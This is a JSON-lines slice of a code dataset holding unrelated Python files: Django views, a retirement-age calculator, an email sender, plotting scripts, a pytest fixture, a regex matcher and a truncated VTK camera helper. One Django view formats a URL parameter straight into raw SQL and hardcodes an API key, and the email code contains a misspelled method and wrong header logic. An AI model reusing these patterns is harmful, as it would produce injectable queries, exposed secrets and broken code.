os.path.join(settings.BASE_DIR, 'readux', 'books', 'models.py')\nbooks_models_modified = datetime.datetime.fromtimestamp(os.path.getmtime(books_models_filename))\nbooks_models_md5sum = md5sum(books_models_filename)\n\ndef unapi_modified(request):\n 'last-modification time for unapi; format list or metadata for a single item'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_modified\n\n # metadata for a specific record\n else:\n return volume_modified(request, item_id)\n\ndef unapi_etag(request):\n 'etag for unapi'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_md5sum\n\n # metadata for a specific record\n else:\n fmt = request.GET.get('format', None)\n if fmt == 'rdf_dc':\n return datastream_etag(request, item_id, Volume.dc.id, type=Volume)\n\n\ndef datastream_lastmodified(request, pid, dsid, type):\n repo = Repository()\n try:\n obj = repo.get_object(pid, type=type)\n ds = obj.getDatastreamObject(dsid)\n if ds and ds.exists:\n return ds.created\n except RequestFailed:\n pass\n\ndef pdf_etag(request, pid):\n 'etag for Volume PDF datastream'\n return datastream_etag(request, pid, Volume.pdf.id)\n\ndef pdf_lastmodified(request, pid):\n 'last modified for Volume PDF datastream'\n return datastream_lastmodified(request, pid, Volume.pdf.id, Volume)\n\ndef ocr_etag(request, pid):\n 'etag for Volume OCR datastream'\n return datastream_etag(request, pid, VolumeV1_0.ocr.id)\n\ndef ocr_lastmodified(request, pid):\n 'last modified for Volume OCR datastream'\n return datastream_lastmodified(request, pid, VolumeV1_0.ocr.id, Volume)\n\n# TODO: consider full text etag/lastmodified methods that would work\n# for both volume v1.0 and v1.1; if v1.0, simple returns ocr methods\n# above; otherwise, no etag is available but last-modified could be pulled\n# from most recent solr indexed page.\n# (If this requires additional fedora api calls to determine type,\n# may be too costly.)\n\ndef page_image_etag(request, pid, **kwargs):\n 'etag for Page image datastream'\n return datastream_etag(request, pid, Page.image.id, type=Page)\n\ndef page_image_lastmodified(request, pid, **kwargs):\n 'last modified for Page image datastream'\n return datastream_lastmodified(request, pid, Page.image.id, type=Page)\n\n","sub_path":"readux/books/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405750133","text":"##################################\r\n# Full Retirement Age Program\r\n# Cesar Carrillo\r\n##################################\r\n\r\n# Libraries\r\nimport math;\r\n\r\n# Global Variables\r\nRETIREMENT_AGES = [ (1937, (65, 0)),\r\n (1938, (65, 2)),\r\n (1939, (65, 4)),\r\n (1940, (65, 6)),\r\n (1941, (65, 8)),\r\n (1942, (65, 10)),\r\n (1943, (66, 0)),\r\n (1954, (66, 0)),\r\n (1955, (66, 2)),\r\n (1956, (66, 4)),\r\n (1957, (66, 6)),\r\n (1958, (66, 8)),\r\n (1959, (66, 10)),\r\n (1960, (67, 0)) ];\r\n\r\nMONTH_NAMES = [ \"January\",\r\n \"February\",\r\n \"March\",\r\n \"April\",\r\n \"May\",\r\n \"June\",\r\n \"July\",\r\n \"August\",\r\n \"September\",\r\n \"October\",\r\n \"November\",\r\n \"December\", ];\r\n\r\n# Input for integers only\r\ndef inputInt(prompt):\r\n integer = input(prompt);\r\n\r\n # Verify string\r\n if(integer.isnumeric()):\r\n return int(integer); # if int then return it\r\n else:\r\n print(\"\\nPlease enter an integer value\\n\");\r\n return inputInt(prompt); # if not call again\r\n\r\n# Returns the retirement age and month (YEAR, MONTH)\r\ndef findRetirementInfo(birthYear):\r\n # Go through the RETIREMENT_AGES list to\r\n # find and return the appropriate information\r\n for i in range(len(RETIREMENT_AGES)):\r\n year = RETIREMENT_AGES[i][0];\r\n age = RETIREMENT_AGES[i][1];\r\n\r\n if(birthYear == year):\r\n return age; # an exact match is found so return\r\n\r\n # because the list has a an ~11 year gap with no\r\n # months added this was the best way I thought to\r\n # check if the birthYear falls in that range\r\n # *for 1943 - 1954\r\n\r\n # make sure we are not at the end of the list\r\n # if so then return as there are no more years to check\r\n if(i >= len(RETIREMENT_AGES) - 1):\r\n return age;\r\n else:\r\n # check the current year (i) with the next year\r\n # if we are in between these years then we fall in\r\n # the range\r\n yearNext = RETIREMENT_AGES[i + 1][0];\r\n\r\n if(birthYear > year and birthYear < yearNext):\r\n return age;\r\n\r\n# Get the birth info from user\r\ndef requestBirthInfo():\r\n year = inputInt(\"Birth Year: \");\r\n month = inputInt(\"Birth Month: \");\r\n\r\n # the return order goes YEAR (0) then MONTH (1)\r\n return (year, month);\r\n\r\n# Calculate and return the retirementAge\r\ndef calculateRetirementDate(birthInfo, retirementInfo):\r\n # Calculate the retirement year and month by\r\n # adding the birthInfo and retirementInfo\r\n # in every function related to this program\r\n # the return order goes YEAR (0) then MONTH (1)\r\n retirementYear = retirementInfo[0] + birthInfo[0];\r\n retirementMonth = birthInfo[1] + retirementInfo[1];\r\n\r\n # If we are more than 12 months then adjust the year and months\r\n if(retirementMonth > 12):\r\n retirementYear += math.floor(retirementMonth / 12);\r\n retirementMonth -= 12;\r\n\r\n return (retirementYear, retirementMonth);\r\n\r\n# Returns month name using given month number\r\ndef getMonthName(month):\r\n return MONTH_NAMES[month - 1];\r\n\r\n# Prints the retirement information in a sentence\r\ndef printRetirementInfo(retirementInfo):\r\n retirementAge = retirementInfo[0];\r\n retirementMonth = retirementInfo[1];\r\n\r\n # Print Text\r\n retirementText = str(retirementAge);\r\n\r\n # Display months?\r\n if(retirementMonth > 0):\r\n retirementText += \" and \" + str(retirementMonth) + \" months\";\r\n\r\n print(\"Your full retirement age is\", retirementText);\r\n\r\n# Print the retirement date in a sentence\r\ndef printRetirementDate(retirementDate):\r\n print(\"this will be in\", getMonthName(retirementDate[1]), \"of\", retirementDate[0]);\r\n\r\n\r\n# Program Entry point\r\ndef main():\r\n\r\n running = True;\r\n\r\n print(\"Social Security Full Retirement Age Calculator\");\r\n\r\n while(running):\r\n print(\"-----------------------------------\");\r\n\r\n # Request info\r\n birthInfo = requestBirthInfo();\r\n\r\n # Calculate retirement age/month\r\n retirementInfo = findRetirementInfo(birthInfo[0]);\r\n\r\n # Print the info\r\n printRetirementInfo(retirementInfo);\r\n\r\n # Calculate the retirement date\r\n retirementDate = calculateRetirementDate(birthInfo, retirementInfo);\r\n\r\n # Print the retirement date\r\n printRetirementDate(retirementDate);\r\n\r\n # Ask if the program should keep running\r\n exitProgram = input(\"\\nExit program? (Y/N) \").lower();\r\n\r\n if(exitProgram == 'y' or exitProgram == 'yes'):\r\n running = False;\r\n\r\n\r\nmain(); # Run\r\n","sub_path":"retirementAge.py","file_name":"retirementAge.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557012191","text":"from email.message import EmailMessage\nfrom smtplib import SMTP\nfrom abc import ABCMeta, abstractmethod\nimport os\n\nclass EmailSender(metaclass=ABCMeta):\n @abstractmethod\n def send(self,msg: EmailMessage):\n pass\n\nclass SimpleEmailSender(EmailSender):\n\n SMTP_SERVER_PORT:str=\"SMTP_SERVER_PORT\"\n\n @classmethod\n def send(cls,msg: EmailMessage):\n server_port = os.environ[cls.SMTP_SERVER_PORT]\n servers = server_port.split(':')\n with SMTP(servers[0],int(servers[1])) as s:\n s.send_messagatsuogae(msg)\n\nclass EmailBuilder:\n\n _registered_email_sender: EmailSender = None\n\n @classmethod\n def send_html_message(cls, from_address: str,subject: str, to_address: list[str]=None, cc_address: list[str]=None,\n body: str=None, attachment_files: list[str] = None) -> EmailMessage:\n email = EmailMessage()\n email['Subject'] = subject\n email['From'] = from_address\n if to_address is not None and len(to_address) > 0 :\n email['To'] = '.'.join(to_address)\n if cc_address is not None and len(cc_address) > 0:\n email['Cc'] = '.'.join(to_address)\n\n if body is not None:\n email.set_content(body, subtype='html')\n\n if attachment_files is not None and len(attachment_files)>1 :\n for filepath in attachment_files:\n mime_type= cls.__get_mime_type(filepath)\n with open(filepath, 'rb') as content_file:\n content = content_file.read()\n email.add_attachment(content,\n maintype=mime_type['maintype'], subtype=mime_type['subtype'],\n filename=filepath)\n\n if cls._registered_email_sender is None:\n SimpleEmailSender().send(email)\n else:\n cls._registered_email_sender.send(email)\n\n return email\n\n @classmethod\n def register_mail_sender(cls, custom_mail_sender: EmailSender):\n cls._registered_email_sender=custom_mail_sender\n\n @classmethod\n def __get_mime_type(cls, path: str) -> dict:\n if path == '':\n return None\n parts = path.split('.')\n if len(parts)<2:\n return None\n\n extension = parts[len(parts)-1]\n\n applications = ['zip','pdf']\n texts=['txt']\n images=['png','jpeg','gif']\n\n if extension in applications:\n return dict(maintype='application',subtype=extension)\n elif extension in images:\n return dict(maintype='image',subtype=extension)\n elif extension=='jpg':\n return dict(maintype='image', subtype='jpeg')\n elif extension=='html':\n return dict(maintype='text',subtype='html')\n elif extension in texts:\n return dict(maintype='text',subtype='plain')\n else:\n return dict(maintype='application',subtype='octet-stream')","sub_path":"tests/resources/source/folder1/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"155023588","text":"# coding:iso-8859-9 Türkçe\r\n# p_31508.py: Izgaralar ile çoklu fonksiyonları çizme örneği.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mp\r\nimport matplotlib.gridspec as mg\r\nfrom p_315 import Renk\r\n\r\nmp.style.use (\"dark_background\")\r\nmp.figure (figsize=(7, 4))\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = mp.subplot (ızgara [0, :])\r\naltşekil1.plot (X, F1, 'r-', X, F2)\r\n\r\naltşekil2 = mp.subplot (ızgara [1, :-1])\r\naltşekil2.plot (X, F3)\r\n\r\naltşekil3 = mp.subplot (ızgara [1:, -1])\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = mp.subplot (ızgara [-1, 0])\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = mp.subplot (ızgara [-1, -2])\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0])\r\n\r\nmp.tight_layout()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n\r\nşekil = mp.figure (figsize=(7, 4))\r\nşekil.set_facecolor (Renk.renk())\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = şekil.add_subplot (ızgara [0, 0:3])\r\naltşekil1.set_facecolor (Renk.renk())\r\naltşekil1.plot (X, F1, 'r-', X, F2, \"y-\")\r\n\r\naltşekil2 = şekil.add_subplot (ızgara [1, 0:2])\r\naltşekil2.set_facecolor (Renk.renk())\r\naltşekil2.plot (X, F3, \"g\")\r\n\r\naltşekil3 = şekil.add_subplot (ızgara [1:3, 2])\r\naltşekil3.set_facecolor (Renk.renk())\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = şekil.add_subplot (ızgara [2, 0])\r\naltşekil4.set_facecolor (Renk.renk())\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = şekil.add_subplot (ızgara [2, 1])\r\naltşekil5.set_facecolor (Renk.renk())\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0], \"m\")\r\n\r\nşekil.tight_layout()\r\nmp.show()\r\n","sub_path":"Bernd Klein (520) ile Python/p_31508.py","file_name":"p_31508.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"448488727","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(req):\n return render(req, 'sinabro/index.html', {'title': 'Sinabro'})\n\ndef convert(req, target, word):\n import json\n from .models import Word\n\n if target in ['south', 'north']:\n query = \"\"\"\n SELECT\n *\n FROM\n sinabro_word\n WHERE\n REPLACE(%s, ' ', '')='%s'\n \"\"\" % ('south' if target == 'north' else 'north', word.replace(' ', ''))\n\n query_result = Word.objects.raw(query)\n matched_words = []\n for q in query_result:\n matched_words.append({\n 'word': q.south if target == \"south\" else q.north,\n 'description': {'word': q.south, 'mean': q.description} if q.description is not None and len(q.description) else dictionary(q.south)\n })\n\n if len(matched_words):\n result = {\n 'code': 200,\n 'target': target,\n 'original_word': word,\n 'converted_word': matched_words\n }\n else:\n result = {\n 'code': 404,\n 'err_message': 'Word not found'\n }\n else:\n result = {\n 'code': 400,\n 'err_message': 'Invalid parameters'\n }\n\n return HttpResponse(json.dumps(result))\n\ndef dictionary(word):\n from urllib.request import urlopen\n from urllib.parse import quote\n import xml.etree.ElementTree as ET\n from .models import Word\n\n key = \"F617DC1EF4D10410220D828231595C24\"\n quoted = quote(word)\n url = \"http://opendict.korean.go.kr/api/search\"\n params = {'key': key, 'q': quoted}\n\n first = True\n for k, v in params.items():\n if first:\n url += '?'\n first = False\n else:\n url += '&'\n url += k + '=' + v\n\n response = urlopen(url).read().decode('utf-8')\n parsed = ET.fromstring(response).findall('item')\n result = [{'word': item.findtext('word').replace('^', ' ').replace('-', ''), 'mean': item.find('sense').findtext('definition')} for item in parsed]\n\n original_word = Word.objects.filter(south=word)\n for orig in original_word:\n orig.description = result[0].get('mean')\n orig.save()\n\n return result[0]\n","sub_path":"sinabro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"587287774","text":"\"\"\"Defines fixtures available to all tests.\"\"\"\nimport os\nimport pathlib\nimport pytest\n\nfrom flask import current_app\nfrom reddit.app import create_app\nfrom reddit.extensions import db\nfrom reddit import subreddits, threads, user, votes\nfrom unittest.mock import patch\n\n\n@pytest.fixture(scope='session')\ndef test_client(request):\n #os.environ['FLASK_ENV'] = 'testing'\n\n mock_app_event_init = patch('reddit.app.event_publisher.init_app')\n mock_db_send_event = patch('reddit.database.event_publisher.send_event')\n mock_db_cache = patch('reddit.database.cache.set')\n\n mock_app_event_init.start()\n mock_db_send_event.start()\n mock_db_cache.start()\n\n mock_app_event_init.return_value = True\n mock_db_send_event.return_value = True\n\n #mock_db_cache.set = log_mock\n\n app = create_app()\n test_client = app.test_client()\n ctx = app.app_context()\n ctx.push()\n\n request.addfinalizer(lambda: ctx.pop())\n\n yield test_client\n\n\n@pytest.fixture(scope=\"session\")\ndef test_database(request, test_client):\n db.create_all()\n\n def tear_down():\n db.drop_all()\n # Hack for sqlite always placing database in app directory rather than root\n database_uri = current_app.config['SQLALCHEMY_DATABASE_URI']\n if database_uri.startswith('sqlite'):\n db_path = database_uri.strip('sqlite:///')\n db_name = pathlib.Path(db_path).name\n for dirname, _, filenames in os.walk('.'):\n for filename in filenames:\n if filename == db_name:\n os.remove(os.path.join(dirname, filename))\n return\n\n request.addfinalizer(tear_down)\n\n yield db\n\n\n@pytest.fixture(scope='module')\ndef test_data(test_database):\n user1 = user.models.User(username='user_test1', email='test1@gmail.com', password='password')\n user2 = user.models.User(username='user_test2', email='test2@gmail.com', password='password')\n user1.save()\n user2.save()\n\n sub1 = subreddits.models.Subreddit(\n name='test_sub1',\n description='A subreddit for testing.',\n creator_id=user1.id\n )\n\n thread1 = threads.models.Thread(\n title='test_thread',\n description='A thread for testing',\n author_id=user1.id,\n subreddit=sub1\n )\n\n data = {'users': [user1, user2],\n 'subreddits': [sub1],\n 'threads': [thread1]}\n\n for key, models in data.items():\n for instance in models:\n if key != 'users':\n instance.save()\n\n yield data\n\n for key, models in data.items():\n for instance in models:\n instance.delete()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"79314695","text":"\"\"\"\n// Time Complexity : O(len(s)*len(p))\n// Space Complexity : O(len(s)*len(p))\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : No\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nGiven below - DP\n\"\"\"\nclass Solution:\n def isMatch(self, s: str, p: str) -> bool:\n \"\"\"\n Main idea is we can break down each ch* into two decision making mode - 0 char or 1 char, since we can expand the string on * at each recursive level, we can get overlapping subproblems with result string/intermediate string acts as subproblem ->DP\n Tabulation method\n - Create a dp array, dp[s.length+1][p.length+1] consisting of False values\n - dp[0][0] = T (blank matches blank)\n - Fill the first row of dp\n If the last element of p == '*'\n dp[0][j] = dp[0][j-2] // go 2 places back such that string before start of * is covered eg _c*a* _c* (for a*) would have been computed before\n - For row = 1 to dp.length\n For col = 1 to dp[0].length\n If current char is not a star \n - s[row-1] == p[col-1] \n dp[row][col] = dp[row-1][col-1]\n else:\n dp[row][col] = dp[row][col-2] #fetching the value corresponding to zero for *\n if s[row-1] == p[col-2] or p[col-2] == '.': # case for considering 1\n dp[row][col] = dp[row][col] or dp[row-1][col]\n \n - return dp[dp.length-1][dp[0].length-1] \n \"\"\"\n dp = [[False for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n dp[0][0] = True\n for j in range(1,len(dp[0])):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-2]\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n #current char in pattern not a star\n if s[i-1] == p[j-1] or p[j-1] == '.':\n dp[i][j] = dp[i-1][j-1]\n elif p[j-1] == '*':\n dp[i][j] = dp[i][j-2] # getting the value for 0 case\n \n #check for case 1 for *\n if s[i-1] == p[j-2] or p[j-2] == '.':\n dp[i][j] |= dp[i-1][j]\n return dp[len(dp)-1][len(dp[0])-1]","sub_path":"regular_expression.py","file_name":"regular_expression.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"238188983","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n This Class is mainly to do camera position for VR and MPR.\n\"\"\"\nimport numpy as np\nimport render_common\nfrom vtk import *\n\n\nclass FovInfo:\n def __init__(self):\n self.ExtentLen = 1 # milimeter\n self.Spacing = 1 # spacing\n self.vecInPatient = [0, 0, 1] # real Ori in Patient Coord\n self.vecInPatientOrth = [0, 0, 1]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n\n self._axis_head = [0.0, 0.0, 1.0]\n self._axis_left = [1.0, 0.0, 1.0]\n self._axis_anterior = [0.0, -1.0, 0.0]\n\n def get_fov_info(self, dim, spacing, orientation, AxisType, AxisPosType):\n \"\"\"\n According to AxisType, Get FovInfo Value\n :param dim:\n :param spacing:\n :param orientation:\n :param AxisType: X_NEG = 0 X_POS = 1 Y_NEG = 2 Y_POS = 3 Z_NEG = 4 Z_POS = 5\n :param AxisPosType: POS_RIGTH = 0 POS_LEFT = 1 POS_ANTERIOR = 2 POS_POSTERIOR = 3 POS_FOOT = 4 POS_HEAD = 5\n :return:\n \"\"\"\n if AxisType is render_common.AxisType.X_POS:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = orientation[0]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_POS\n elif AxisType is render_common.AxisType.X_NEG:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = - orientation[0]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_NEG\n elif AxisType is render_common.AxisType.Y_POS:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Y_POS\n elif AxisType is render_common.AxisType.Y_NEG:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = - orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType] * -1\n self.vVolumeCoord = render_common.AxisType.Y_NEG\n elif AxisType is render_common.AxisType.Z_POS:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = orientation[2]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n elif AxisType is render_common.AxisType.Z_NEG:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = - orientation[2]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_NEG\n return self\n\n\ndef cal_nearest_axis(dim, spacing, orientation, FovHead, FovLeft, FovAnterior):\n \"\"\"\n By Calculating the projection of volume orientation in the patient XYZ Axis, we can get the volume 是\n 体数据是侧卧,还是背卧,还是正躺等\n 确定与病人头方向、左方向、前方向最为接近的volume坐标系下的坐标轴及三个轴方向在病人坐标系下实际方向\n :param dim:\n :param spacing:\n :param orientation:\n :param FovHead: 与病人头方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovLeft: 与病人左方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovAnterior: 与病人前方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :return:\n \"\"\"\n left_patient_coord = [1, 0, 0]\n anterior_patient_coord = [0, -1, 0]\n head_patient_coord = [0, 0, 1]\n orientation[0] = orientation[0] / np.linalg.norm(orientation[0]) # normalize of orientation\n orientation[1] = orientation[1] / np.linalg.norm(orientation[1]) # normalize of orientation\n orientation[2] = orientation[2] / np.linalg.norm(orientation[2]) # normalize of orientation\n volume_x_head = np.dot(orientation[0], head_patient_coord)\n volume_y_head = np.dot(orientation[1], head_patient_coord)\n volume_z_head = np.dot(orientation[2], head_patient_coord)\n volume_x_left = np.dot(orientation[0], left_patient_coord)\n volume_y_left = np.dot(orientation[1], left_patient_coord)\n volume_z_left = np.dot(orientation[2], left_patient_coord)\n volume_x_anterior = np.dot(orientation[0], anterior_patient_coord)\n volume_y_anterior = np.dot(orientation[1], anterior_patient_coord)\n volume_z_anterior = np.dot(orientation[2], anterior_patient_coord)\n\n # Priority is TRA > COR > SAG.\n if np.abs(volume_z_head) > np.abs(volume_y_head) and np.abs(np.abs(volume_z_head)) > np.abs(volume_x_head):\n if volume_z_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Z_NEG\n if np.abs(volume_x_left) > np.abs(volume_y_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n else:\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_x_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n elif np.abs(volume_y_head) > np.abs(volume_x_head) and np.abs(volume_y_head) > np.abs(volume_z_head):\n if volume_y_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Y_NEG\n if np.abs(volume_x_left) > np.abs(volume_z_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n else:\n if volume_x_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.X_NEG\n if np.abs(volume_y_left) > np.abs(volume_z_left):\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n\n # int(render_common.PatientPositionType.POS_HEAD)\n fov_head = FovHead.get_fov_info(dim, spacing, orientation, FovHead.vVolumeCoord, 5)\n # int(render_common.PatientPositionType.POS_LEFT)\n fov_left = FovLeft.get_fov_info(dim, spacing, orientation, FovLeft.vVolumeCoord, 1)\n # int(render_common.PatientPositionType.POS_ANTERIOR)\n fov_anterior = FovAnterior.get_fov_info(dim, spacing, orientation, FovAnterior.vVolumeCoord, 2)\n return fov_head, fov_left, fov_anterior\n\n\ndef get_default_camera_lookat(fovinfo_head, fovinfo_left, fovinfo_anterior, pos_type, center):\n \"\"\"\n According to fovinfo_head, fovinfo_left, fovinfo_anterior to get camera lookat point\n :param fovinfo_head:\n :param fovinfo_left:\n :param fovinfo_anterior:\n :param pos_type: PositionType\n :param ptlookat:\n :return:\n \"\"\"\n look_at_point = center\n if pos_type is render_common.PositionType.SAGITTAL:\n view_dir = - fovinfo_left.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n # +0.5是为了消除double数计算所带来的精度误差\n sag_dim = int(fovinfo_left.ExtentLen / fovinfo_left.Spacing + 0.5)\n if (sag_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_left.Spacing\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n view_dir = - fovinfo_head.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n tra_dim = int(fovinfo_head.ExtentLen / fovinfo_head.Spacing + 0.5)\n if (tra_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_head.Spacing\n else:\n view_dir = - fovinfo_anterior.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n ant_dim = int(fovinfo_anterior.ExtentLen / fovinfo_anterior.Spacing + 0.5)\n if (ant_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_anterior.Spacing\n return look_at_point\n\n\ndef check_orthogonal(orientation):\n \"\"\"\n Check Volume is Orthogonal. If the volume is not orthogonal , then eys_dir should be re-calculated for MPRs\n :param orientation:\n :return:\n \"\"\"\n MIN_TOLERANCE = 0.000001\n dot_x_y = np.dot(orientation[0], orientation[1])\n dot_x_z = np.dot(orientation[0], orientation[2])\n dot_y_z = np.dot(orientation[1], orientation[2])\n\n if dot_x_y > MIN_TOLERANCE or dot_x_z > MIN_TOLERANCE or dot_y_z > MIN_TOLERANCE:\n return False\n else:\n return True\n\n\ndef get_default_mpr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is 